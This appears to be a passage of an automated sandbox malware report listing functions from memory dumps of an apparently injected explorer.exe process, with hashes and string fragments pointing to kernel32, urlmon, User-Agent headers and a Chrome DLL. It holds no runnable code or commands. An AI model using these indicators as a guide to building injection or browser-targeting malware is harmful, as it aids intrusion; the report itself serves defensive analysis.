                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction ID: 551dd685986502741063fc5b83e20ac410c7ef10453a630473c58e9105a9bf6a
                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction Fuzzy Hash: 5F416E31A1AF0D8FCB58EF6881A47AE77E6FB58300F50016AA80ED7342DA75D5418B86
                                                                                                                                                  Function 0E660432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction ID: c09a674e5c254ae413253518feca3579967b4824123a7b5bbade68815501a102
                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction Fuzzy Hash: 0A41BF70618B488FD7B8DF2890943AAB7E1FB99304F104A7E949EC3255DB70D845CB81
                                                                                                                                                  Function 0E597432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction ID: 7364a24d26edd46bf027a8e04638799cd77538f4f3276429abe8b2e23124c00b
                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction Fuzzy Hash: 22419270618B498FDBA8DF2984843BAB7E5FB98300F144E6F959EC3255DB70C945CB41
                                                                                                                                                  Function 0F6E0432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction ID: 8675320190fccc06bfc8f54a9e6160e39e0c9a97e4f97b524d4af6dc9991c9a4
                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction Fuzzy Hash: B2419F71609B488FD7A8DF2880883BAB7E1FB98300F544A2E949EC3256DF70D545CB85
                                                                                                                                                  Function 0E6670B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction ID: 853942abe24fca288f78396a6e20ad47623acf296eaedd0536421c6669097b2d
                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction Fuzzy Hash: D031047152CB886FC71AEB68D0886DAB7D4FB84300F504D1EE49BC7251EE31A949CB47
                                                                                                                                                  Function 0E59E0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction ID: e48897f81c890ed0b35012ba0a948e06ff9a75527edcb727538157fd32c5ee5f
                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction Fuzzy Hash: DD31DE71518B886FC71AEB28D0856EEB7D4FB94300F504D1EE59BC7252EE30A94ACB43
                                                                                                                                                  Function 0F6E70B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction ID: 4252f0a356bc39fd2524e4bc07832e5057f3ece4c916c276e675d7f397e9f7db
                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction Fuzzy Hash: FA31027251DB886FC71AEB68C0846DAB7D4FB84300F50491EE49BC7252EF35A54ACB47
                                                                                                                                                  Function 0E6670C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                  • Instruction ID: 5db5ecd79e4e1e51ef4b2f811564e30deec209b3341b4989f0a2735816ed44bd
                                                                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                  • Instruction Fuzzy Hash: 9931C271528B486FD719EB28D4846EAB7D4FB94300F504D1EE49BC7251EE30A906CA46
                                                                                                                                                  Function 0E59E0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                  • Instruction ID: 8b2b1d5441435e66c445bd10d8848c1e30f2f5ef17bd628f6f299999c78dc5ce
                                                                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                  • Instruction Fuzzy Hash: 8B31E071518B486FD71AEB28C4856EEB7D4FBD4300F404D2EE59BC3251EE30A906CA43
                                                                                                                                                  Function 0F6E70C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                  • Instruction ID: 79eda3794cd6478d346cb54a596078ebc784a23ef2f1a96e7e16e08cc500ce05
                                                                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                  • Instruction Fuzzy Hash: 5731E172519B486FD71AEB28C4846EAB7D4FB94300F50491EE4ABC3252EE34E506CA46
                                                                                                                                                  Function 0E662FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                  • Instruction ID: dc2666eae3b3a5a83352553fd393fc32bc64aa4b399eb5f7ed4d8a9d612c1a79
                                                                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                  • Instruction Fuzzy Hash: 40314F70228B484FCB84EF68A494BAAB7E1FBD9300F944A6D944ACB355DF30D905C796
                                                                                                                                                  Function 0E599FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                  • Instruction ID: 9ef0f7674da0d919297f821810eaae33cb36ae53dc167241551c9b4ca5b26e8c
                                                                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                  • Instruction Fuzzy Hash: 87315C70218B094FCB84EF688495BAAB6E1FFD8200F840E3D964ACB215DF30C9459752
                                                                                                                                                  Function 0F6E2FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                  • Instruction ID: 1e9187b2867342601e95531d1766939467a15a60ddeea123596be9ed88bc7d96
                                                                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                  • Instruction Fuzzy Hash: 9D318031119B088FCB84EF688495BAAB7E1FF98300F94462D944ECB356DF34D505C796
                                                                                                                                                  Function 0E662FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                  • Instruction ID: 7e0ce1779cd8b135a5248143aed9f91ecf2a6695743e512cf6309d38778c605b
                                                                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                  • Instruction Fuzzy Hash: 55316F70228B484FCB84EF68A494BAAB7E1FFD9300F944A6D944ACB355DF30C905C796
                                                                                                                                                  Function 0E599FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                  • Instruction ID: 6375d845d4119881aaf2ca0ce0e04ed6abbe33449cffc538f609f37a62d0ade5
                                                                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                  • Instruction Fuzzy Hash: 34316B70218B094FCB94EF688494BAAB7E1FFD8200F840E3D964ACB255DF30C9059752
                                                                                                                                                  Function 0F6E2FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                  • Instruction ID: ac2150de3700c04a67e703f84b9c906b8ecf75993505d0fbdb1603595feba32e
                                                                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                  • Instruction Fuzzy Hash: B7319E32219B088FCB94EF688495BAAB7E1FF98300F94462D944ACB356DF34C505C786
                                                                                                                                                  Function 0E6658C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction ID: b5735b4e5e2e761e4e1e804e95c6afacc1fae3d7e262385b78e36274fc119ce5
                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction Fuzzy Hash: D031BF31624A4C8BCF44EFA8D8897EEB7E1FB58314F40462ED45ED7250EE788A45C789
                                                                                                                                                  Function 0E59C8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction ID: a81b552e58aa1e7e128f6847ae13c9b9d087a7bf214be50065143a6f20cfa11e
                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction Fuzzy Hash: 0831D171614A0D8FCF04EFA8D8847EDBBE4FB98204F444A2AD64ED7250EE748A45C789
                                                                                                                                                  Function 0F6E58C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction ID: e7125711ef3e21ce613e4e149079e8ea50e2e97ffc547305b5edfdde5b425760
                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                  • Instruction Fuzzy Hash: D531AE32615B4C8BCB44EFA8C8857EEB7E1FB58214F40422AD45ED7251EF788A45C789
                                                                                                                                                  Function 0E6658BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: dbf003a4d28d9fc475b5cbb62e78d6e0bab1ffe053cfe10055cfd280dc2592f8
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 7921C130620A4C8BCF04EFA8D8857EEBBE1FF58304F40462ED45AD7250DF748A458789
                                                                                                                                                  Function 0E59C8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: d9a4f8b5fc289a331cf85ad30870b52cbaf2ec3da63eb0f5b4388bdec0cb7a75
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 8021F670610A0D8FCF04EFA8C8847EDBBE4FF98204F444A2AD65AD7250EF748A05C789
                                                                                                                                                  Function 0F6E58BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: 7efe63adda4d963b3125cb24900e0a29cba0db48608f99983dfac3edfd1ff143
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 5521D232611B4C8BCB44EFA8C8857EDBBE1FF58204F40422ED45AD7252EF789645CB89
                                                                                                                                                  Function 0E666E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction ID: dc0ce9146ecae861b9e09f48f755922e2f3c5fdc542f2d5d234f17be8812be92
                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction Fuzzy Hash: 60216D74A24E4D9BDB04EFA8E4447EDBBF1FB58304F504A2ED049E3600DB749951CB88
                                                                                                                                                  Function 0E666E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction ID: 865d0933ca6c44f03e4644223d5fd2c28e81910d4e5203818091ac51caf84eb2
                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction Fuzzy Hash: 77215C74A24E4D9FDB44EFA8E0447AEBBF1FB58304F504A2ED049E3610DB749951CB88
                                                                                                                                                  Function 0E59DE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction ID: e8cb9de52d3a740be60492269aa9c4c27a6eb73cca728801d14b792eb9be7ef6
                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction Fuzzy Hash: 69217C74A24A0E9FDB04EFA8D4447ADBBF1FF58304F544A2ED209D3610DB749955CB84
                                                                                                                                                  Function 0E59DE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
